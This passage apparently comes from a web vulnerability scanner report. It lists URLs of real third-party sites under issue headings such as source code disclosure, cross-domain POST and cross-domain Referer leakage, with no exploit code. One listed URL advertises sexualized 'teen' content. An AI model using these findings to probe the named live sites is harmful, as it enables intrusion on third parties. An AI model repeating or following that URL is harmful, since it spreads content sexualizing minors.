15.46. http://forums.freebsd.org/

15.47. http://help.tweetmeme.com/

15.48. http://help.tweetmeme.com/2009/04/07/api-documentation/

15.49. http://help.tweetmeme.com/2009/04/09/rss-feeds/

15.50. http://help.tweetmeme.com/2009/04/09/twitter-feeds/

15.51. http://help.tweetmeme.com/contact/

15.52. http://help.tweetmeme.com/forum/forum/33

15.53. http://help.tweetmeme.com/language/

15.54. http://it.toolbox.com/blogs/database-soup

15.55. http://it.toolbox.com/blogs/database-talk

15.56. http://it.toolbox.com/blogs/db2luw

15.57. http://it.toolbox.com/blogs/db2zos

15.58. http://it.toolbox.com/blogs/elsua

15.59. http://it.toolbox.com/blogs/juice-analytics

15.60. http://it.toolbox.com/blogs/minimalit

15.61. http://it.toolbox.com/blogs/penguinista-databasiensis

15.62. http://it.toolbox.com/blogs/ppmtoday

15.63. http://joomlacode.org/gf/account/

15.64. http://my.joomla.org/

15.65. http://netvouz.com/action/submitBookmark

15.66. http://newsguy.com/

15.67. http://people.joomla.org/

15.68. http://people.joomla.org/

15.69. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html

15.70. http://resources.joomla.org/

15.71. http://resources.joomla.org/directory/advsearch.html

15.72. http://resources.joomla.org/directory/new.html

15.73. http://resources.joomla.org/how-to-add-listings.html

15.74. http://slashdot.org/bookmark.pl

15.75. http://slashdot.org/bookmark.pl

15.76. http://spongecell.com/event_list

15.77. http://themehybrid.com/

15.78. http://themehybrid.com/themes/shadow

15.79. http://twitter.com/

15.80. http://twitter.com/7News/

15.81. http://twitter.com/7News/newsteam

15.82. http://twitter.com/7news

15.83. http://twitter.com/LizPW/

15.84. http://twitter.com/cw56

15.85. http://twitter.com/datasift

15.86. http://twitter.com/joomla

15.87. http://twitter.com/kontentdesign

15.88. http://twitter.com/nbc/primetime

15.89. http://twitter.com/netlingo

15.90. http://twitter.com/spies_assassins

15.91. http://twitter.com/tweetmeme

15.92. http://twitter.com/typekit

15.93. http://twitter.com/ups

15.94. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu

15.95. http://wordpress.org/extend/plugins/tweetmeme-follow-button/

15.96. http://wordpress.org/extend/plugins/tweetmeme/

15.97. http://wordpress.org/extend/plugins/wp-pagenavi/

15.98. http://www.adside.com/adside/advertiser.html

15.99. http://www.adside.com/adside/publisher.html

15.100. http://www.americascupmedia.com/index.php

15.101. http://www.barkerstores.com/soundings/

15.102. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

15.103. http://www.cloudaccess.net/client-login.html

15.104. http://www.dedipower.com/

15.105. http://www.dynamicdrive.com/forums/showthread.php

15.106. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html

15.107. http://www.facebook.com/

15.108. http://www.facebook.com/

15.109. http://www.facebook.com/%s

15.110. http://www.facebook.com/2008/fbml

15.111. http://www.facebook.com/7NEWS

15.112. http://www.facebook.com/LIMEprpromo

15.113. http://www.facebook.com/abid.bahloul

15.114. http://www.facebook.com/apps/application.php

15.115. http://www.facebook.com/beirutcityguide

15.116. http://www.facebook.com/connect/connect.php

15.117. http://www.facebook.com/miofeghali

15.118. http://www.facebook.com/paty.kfoury

15.119. http://www.facebook.com/plugins/likebox.php

15.120. http://www.facebook.com/profile.php

15.121. http://www.facebook.com/sharer.php

15.122. https://www.google.com/accounts/Login

15.123. https://www.google.com/accounts/ServiceLogin

15.124. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

15.125. http://www.homes.com/

15.126. http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang

15.127. http://www.joomla.org/login.html

15.128. http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived

15.129. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

15.130. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html

15.131. http://www.joomlainorge.no/nyheter/joomla/552-joomlar-16-er-utgitt

15.132. http://www.linkagogo.com/go/AddNoPopup

15.133. http://www.lithuanianjoomla.com/

15.134. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html

15.135. http://www.lithuanianjoomla.com/apie-joomla.html

15.136. http://www.lithuanianjoomla.com/component/users/

15.137. http://www.lithuanianjoomla.com/component/users/

15.138. http://www.lithuanianjoomla.com/index.php

15.139. http://www.lithuanianjoomla.com/joomla-naujienos.html

15.140. http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

15.141. http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

15.142. http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

15.143. http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

15.144. http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

15.145. http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

15.146. http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html

15.147. http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

15.148. http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

15.149. http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html

15.150. http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

15.151. http://www.lithuanianjoomla.com/joomla-sasajos.html

15.152. http://www.lithuanianjoomla.com/joomla-saugumas.html

15.153. http://www.lithuanianjoomla.com/joomla-versijos.html

15.154. http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html

15.155. http://www.lithuanianjoomla.com/kontaktai.html

15.156. http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html

15.157. http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html

15.158. http://www.lithuanianjoomla.com/naujienos.html

15.159. http://www.lithuanianjoomla.com/saugi-joomla.html

15.160. http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

15.161. http://www.livejournal.com/update.bml

15.162. http://www.livejournal.com/update.bml

15.163. http://www.myspace.com/netlingo

15.164. http://www.nbc.com/

15.165. http://www.netlingo.com/login.php

15.166. http://www.netlingo.com/register-premium.php

15.167. http://www.netlingo.com/register.php

15.168. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

15.169. http://www.noreastermagazine.com/

15.170. http://www.paperg.com/

15.171. https://www.paperg.com/post.php

15.172. https://www.paperg.com/post.php

15.173. http://www.playshakespeare.com/

15.174. http://www.regattaregatta.com/

15.175. http://www.rockettheme.com/

15.176. http://www.shape.com/workouts/articles/blood_sugar.html

15.177. http://www.shape.com/workouts/articles/workout_schedule.html

15.178. http://www.svenskjoomla.se/index.php

15.179. http://www.thefeast.com/boston/

15.180. http://www.thefeast.com/boston/

15.181. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

15.182. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

15.183. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

15.184. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

15.185. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

15.186. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

15.187. http://www.usaca.info/

15.188. http://www.w-w-i.com/

15.189. http://www.w-w-i.com/velux_5_oceans_2010_race/

15.190. http://www.woothemes.com/

15.191. http://www.x64bitdownload.com/

15.192. http://www.x64bitdownload.com/64-bit-archive-downloads.html

15.193. http://www.x64bitdownload.com/64-bit-assembling-downloads.html

15.194. http://www.x64bitdownload.com/64-bit-atom-downloads.html

15.195. http://www.x64bitdownload.com/64-bit-audio-downloads.html

15.196. http://www.x64bitdownload.com/64-bit-automatic-downloads.html

15.197. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html

15.198. http://www.x64bitdownload.com/64-bit-binaries-downloads.html

15.199. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html

15.200. http://www.x64bitdownload.com/64-bit-binary-downloads.html

15.201. http://www.x64bitdownload.com/64-bit-board-downloads.html

15.202. http://www.x64bitdownload.com/64-bit-boards-downloads.html

15.203. http://www.x64bitdownload.com/64-bit-client-downloads.html

15.204. http://www.x64bitdownload.com/64-bit-commander-downloads.html

15.205. http://www.x64bitdownload.com/64-bit-community-downloads.html

15.206. http://www.x64bitdownload.com/64-bit-complex-downloads.html

15.207. http://www.x64bitdownload.com/64-bit-conference-downloads.html

15.208. http://www.x64bitdownload.com/64-bit-cross-downloads.html

15.209. http://www.x64bitdownload.com/64-bit-download-downloads.html

15.210. http://www.x64bitdownload.com/64-bit-downloader-downloads.html

15.211. http://www.x64bitdownload.com/64-bit-explorer-downloads.html

15.212. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

15.213. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html

15.214. http://www.x64bitdownload.com/64-bit-feed-downloads.html

15.215. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html

15.216. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html

15.217. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html

15.218. http://www.x64bitdownload.com/64-bit-firefox-downloads.html

15.219. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html

15.220. http://www.x64bitdownload.com/64-bit-forum-downloads.html

15.221. http://www.x64bitdownload.com/64-bit-forums-downloads.html

15.222. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html

15.223. http://www.x64bitdownload.com/64-bit-grabber-downloads.html

15.224. http://www.x64bitdownload.com/64-bit-group-downloads.html

15.225. http://www.x64bitdownload.com/64-bit-groups-downloads.html

15.226. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html

15.227. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html

15.228. http://www.x64bitdownload.com/64-bit-images-downloads.html

15.229. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html

15.230. http://www.x64bitdownload.com/64-bit-internet-downloads.html

15.231. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html

15.232. http://www.x64bitdownload.com/64-bit-killfile-downloads.html

15.233. http://www.x64bitdownload.com/64-bit-mp3-downloads.html

15.234. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html

15.235. http://www.x64bitdownload.com/64-bit-multipart-downloads.html

15.236. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html

15.237. http://www.x64bitdownload.com/64-bit-news-downloads.html

15.238. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html

15.239. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html

15.240. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

15.241. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html

15.242. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

15.243. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html

15.244. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

15.245. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html

15.246. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html

15.247. http://www.x64bitdownload.com/64-bit-nntp-downloads.html

15.248. http://www.x64bitdownload.com/64-bit-nzb-downloads.html

15.249. http://www.x64bitdownload.com/64-bit-ozum-downloads.html

15.250. http://www.x64bitdownload.com/64-bit-par-downloads.html

15.251. http://www.x64bitdownload.com/64-bit-podcast-downloads.html

15.252. http://www.x64bitdownload.com/64-bit-posts-downloads.html

15.253. http://www.x64bitdownload.com/64-bit-rar-downloads.html

15.254. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html

15.255. http://www.x64bitdownload.com/64-bit-reader-downloads.html

15.256. http://www.x64bitdownload.com/64-bit-reading-downloads.html

15.257. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html

15.258. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html

15.259. http://www.x64bitdownload.com/64-bit-rss-downloads.html

15.260. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html

15.261. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html

15.262. http://www.x64bitdownload.com/64-bit-search-downloads.html

15.263. http://www.x64bitdownload.com/64-bit-ssl-downloads.html

15.264. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html

15.265. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html

15.266. http://www.x64bitdownload.com/64-bit-topic-downloads.html

15.267. http://www.x64bitdownload.com/64-bit-troll-downloads.html

15.268. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html

15.269. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html

15.270. http://www.x64bitdownload.com/64-bit-use-next-downloads.html

15.271. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html

15.272. http://www.x64bitdownload.com/64-bit-usenet-downloads.html

15.273. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html

15.274. http://www.x64bitdownload.com/64-bit-usenext-downloads.html

15.275. http://www.x64bitdownload.com/64-bit-video-downloads.html

15.276. http://www.x64bitdownload.com/64-bit-xpat-downloads.html

15.277. http://www.x64bitdownload.com/64-bit-yenc-downloads.html

15.278. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html

15.279. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

15.280. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html

15.281. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

15.282. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

15.283. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html

15.284. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

15.285. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

15.286. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

15.287. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

15.288. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

15.289. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

15.290. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

15.291. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

15.292. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

15.293. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html

15.294. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html

15.295. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html

15.296. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

15.297. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

15.298. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html

15.299. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

15.300. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html

15.301. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html

15.302. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html

15.303. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html

15.304. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html

15.305. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html

15.306. http://www.x64bitdownload.com/contact.html

15.307. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html

15.308. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html

15.309. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

15.310. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

15.311. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

15.312. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

15.313. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html

15.314. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

15.315. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

15.316. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

15.317. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html

15.318. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html

15.319. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

15.320. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

15.321. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html

15.322. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html

15.323. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html

15.324. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

15.325. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html

15.326. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

15.327. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html

15.328. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

15.329. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

15.330. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

15.331. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

15.332. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

15.333. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

15.334. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

15.335. http://www.x64bitdownload.com/drivers/

15.336. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html

15.337. http://www.x64bitdownload.com/featured-software.html

15.338. http://www.x64bitdownload.com/linktous.html

15.339. http://www.x64bitdownload.com/new-reviews.html

15.340. http://www.x64bitdownload.com/new-software.html

15.341. http://www.x64bitdownload.com/saved-software.html

15.342. http://www.x64bitdownload.com/saved-software.html

15.343. http://www.x64bitdownload.com/software-advanced.html

15.344. http://www.x64bitdownload.com/submit-pad-file.html

15.345. http://www.x64bitdownload.com/tellafriend.html

15.346. http://www.x64bitdownload.com/top-software-downloads.html

16. Source code disclosure

16.1. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab

16.2. http://meyerweb.com/eric/tools/css/reset/

16.3. http://mozex.mozdev.org/index.html

16.4. http://www.addthis.com/bookmark.php

16.5. http://www.addthis.com/feed.php

16.6. http://www.kbsp.com/x/fonts/AKZIGBES.TTF

16.7. http://www.zazzle.com/netlingo

17. Silverlight cross-domain policy

18. Referer-dependent response

18.1. http://ads.dailystar.com.lb/www/delivery/afr.php

18.2. http://as1.whdh.com/pan/adjs.php

18.3. http://as1.whdh.com/pan/adx.js

18.4. http://as2.whdh.com/m/m.php

18.5. http://as2.whdh.com/m/m.php/1295906165143/m.gif

18.6. http://as2.whdh.com/m/m.php/1295906189027/m.gif

18.7. http://as2.whdh.com/m/m.php/1295906202010/m.gif

18.8. http://as2.whdh.com/m/m.php/1295920516924/m.gif

18.9. http://as2.whdh.com/m/m.php/1295920639137/m.gif

18.10. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction

18.11. http://www.apture.com/js/apture.js

18.12. http://www.facebook.com/extern/login_status.php

18.13. http://www.facebook.com/plugins/like.php

18.14. http://www.facebook.com/plugins/likebox.php

18.15. http://www.flickr.com/badge_code_v2.gne

19. Cross-domain POST

19.1. http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

19.2. http://flybase.org/reports/FBgn0000146.html/x22

19.3. http://joomla.pl/powiadomienia/577-joomla-16-wydany.html

19.4. http://lesterchan.net/

19.5. http://noisybox.net/computers/nzbperl/

19.6. http://venedet.michnica.net/download/donate.html

19.7. http://www.autotraderclassics.com/find/index.xhtml/x22

19.8. http://www.autotraderclassics.com/x22

19.9. http://www.barelyfitz.com/projects/tabber/

19.10. http://www.cloudaccess.net/contact-us.html

19.11. http://www.elmundo.es/

19.12. http://www.espatial.com/contact/live-trial-adwords

19.13. http://www.freebsdfoundation.org/donate/

19.14. http://www.hashemian.com/

19.15. http://www.hashemian.com/

19.16. http://www.huddletogether.com/projects/lightbox2/

19.17. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

19.18. http://www.jt.gen.tr/makaleler/46-joomla-16.html

19.19. http://www.littlewebthings.com/projects/countdown/

19.20. http://www.littlewebthings.com/projects/countdown/

19.21. http://www.littlewebthings.com/projects/countdown/

19.22. http://www.netlingo.com/advertise/payments.php

19.23. http://www.ossp.org/pkg/tool/lmtp2nntp/

19.24. http://www.outdoorphotographer.com/

19.25. http://www.outdoorphotographer.com/

19.26. http://www.outdoorphotographer.com/

19.27. http://www.playshakespeare.com/

19.28. http://www.sailinganarchy.com/advertise.htm

20. Cross-domain Referer leakage

20.1. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91

20.2. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91

20.3. http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3

20.4. http://ad.doubleclick.net/adj/N3753.autotrader.com/B4276010.21

20.5. http://ad.turn.com/server/ads.js

20.6. http://ad.turn.com/server/ads.js

20.7. http://ads.pointroll.com/PortalServe/

20.8. http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1274126425/Right1/TOLMedia/House-TOL-Sky/smtol-120x600.jpg/72634857383030396f616f4141783156

20.9. http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f4141783156

20.10. http://ads.tweetmeme.com/serve.js

20.11. http://ads.tweetmeme.com/serve.js

20.12. http://ads.tweetmeme.com/serve.js

20.13. http://adserver.teracent.net/tase/ad

20.14. http://adserver.teracent.net/tase/ad

20.15. http://autotrader.dealix.com/step1.asp

20.16. https://billing.cloudaccess.net/cart.php

20.17. https://billing.cloudaccess.net/submitticket.php

20.18. http://blogsearch.google.com/

20.19. http://books.google.com/bkshp

20.20. https://bugzilla.mozilla.org/show_bug.cgi

20.21. http://cdn.apture.com/media/app.khtml.js

20.22. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html

20.23. http://cm.g.doubleclick.net/pixel

20.24. http://cm.g.doubleclick.net/pixel

20.25. http://cms.ad.yieldmanager.net/v1/cms

20.26. http://content.worldnow.com/global/tools/video/WNVideoCodebase_v2.js

20.27. http://d1.openx.org/afr.php

20.28. http://d1.openx.org/afr.php

20.29. http://demo.joomla.org/index.php

20.30. http://demo16.cloudaccess.net/administrator/index.php

20.31. http://disqus.com/forums/integrations/twitter/tweetbox.html

20.32. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23

20.33. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23

20.34. http://docs.google.com/viewer

20.35. http://docs.joomla.org/index.php

20.36. http://fls.doubleclick.net/activityi

20.37. http://fls.doubleclick.net/activityi

20.38. http://fls.doubleclick.net/activityi

20.39. http://forum.joomla.org/ucp.php

20.40. http://forum.joomla.org/viewforum.php

20.41. http://forum.joomla.org/viewtopic.php

20.42. http://googleads.g.doubleclick.net/pagead/ads

20.43. http://googleads.g.doubleclick.net/pagead/ads

20.44. http://googleads.g.doubleclick.net/pagead/ads

20.45. http://googleads.g.doubleclick.net/pagead/ads

20.46. http://googleads.g.doubleclick.net/pagead/ads

20.47. http://googleads.g.doubleclick.net/pagead/ads

20.48. http://googleads.g.doubleclick.net/pagead/ads

20.49. http://googleads.g.doubleclick.net/pagead/ads

20.50. http://googleads.g.doubleclick.net/pagead/ads

20.51. http://googleads.g.doubleclick.net/pagead/ads

20.52. http://googleads.g.doubleclick.net/pagead/ads

20.53. http://googleads.g.doubleclick.net/pagead/ads

20.54. http://googleads.g.doubleclick.net/pagead/ads

20.55. http://googleads.g.doubleclick.net/pagead/ads

20.56. http://googleads.g.doubleclick.net/pagead/ads

20.57. http://googleads.g.doubleclick.net/pagead/ads

20.58. http://googleads.g.doubleclick.net/pagead/ads

20.59. http://googleads.g.doubleclick.net/pagead/ads

20.60. http://googleads.g.doubleclick.net/pagead/ads

20.61. http://googleads.g.doubleclick.net/pagead/ads

20.62. http://googleads.g.doubleclick.net/pagead/ads

20.63. http://googleads.g.doubleclick.net/pagead/ads

20.64. http://googleads.g.doubleclick.net/pagead/ads

20.65. http://googleads.g.doubleclick.net/pagead/ads

20.66. http://googleads.g.doubleclick.net/pagead/ads

20.67. http://googleads.g.doubleclick.net/pagead/ads

20.68. http://googleads.g.doubleclick.net/pagead/ads

20.69. http://googleads.g.doubleclick.net/pagead/ads

20.70. http://googleads.g.doubleclick.net/pagead/ads

20.71. http://groups.google.com/groups

20.72. http://groups.google.com/grphp

20.73. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp

20.74. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp

20.75. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp

20.76. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp

20.77. http://joomlacode.org/gf/account/

20.78. http://joomlacode.org/gf/project/

20.79. http://joomlacode.org/gf/project/com_joodater/news/

20.80. http://joomlacode.org/gf/project/feedgator/frs/

20.81. http://joomlacode.org/gf/project/feedgator/news/

20.82. http://joomlacode.org/gf/project/imgttfmenu/news/

20.83. http://joomlacode.org/gf/project/joomla/frs/

20.84. http://joomlacode.org/gf/project/joomla/reporting/

20.85. http://joomlacode.org/gf/project/joomla/scmsvn/

20.86. http://joomlacode.org/gf/project/joomla/tracker/

20.87. http://joomlacode.org/gf/project/mambot_google1/news/

20.88. http://joomlacode.org/gf/project/opengallery/news/

20.89. http://joomlacode.org/gf/search/

20.90. http://jqueryui.com/themeroller/

20.91. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

20.92. http://loadus.exelator.com/load/

20.93. http://loadus.exelator.com/load/net.php

20.94. http://maps.google.com/maps

20.95. http://maps.google.com/maps

20.96. http://maps.google.com/maps

20.97. http://maps.google.com/maps

20.98. http://maps.google.com/maps/place

20.99. http://maps.google.com/maps/place

20.100. http://maps.google.com/maps/place

20.101. http://media.fastclick.net/w/pg

20.102. http://media.fastclick.net/w/pg

20.103. http://media.fastclick.net/w/win.bid

20.104. http://network4g.verizonwireless.com/

20.105. http://news.google.com/news/story

20.106. http://news.google.com/news/story

20.107. http://news.google.com/news/story

20.108. http://news.google.com/news/story

20.109. http://news.google.com/nwshp

20.110. http://news.google.com/nwshp

20.111. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1002926843/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.112. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006372113/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.113. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

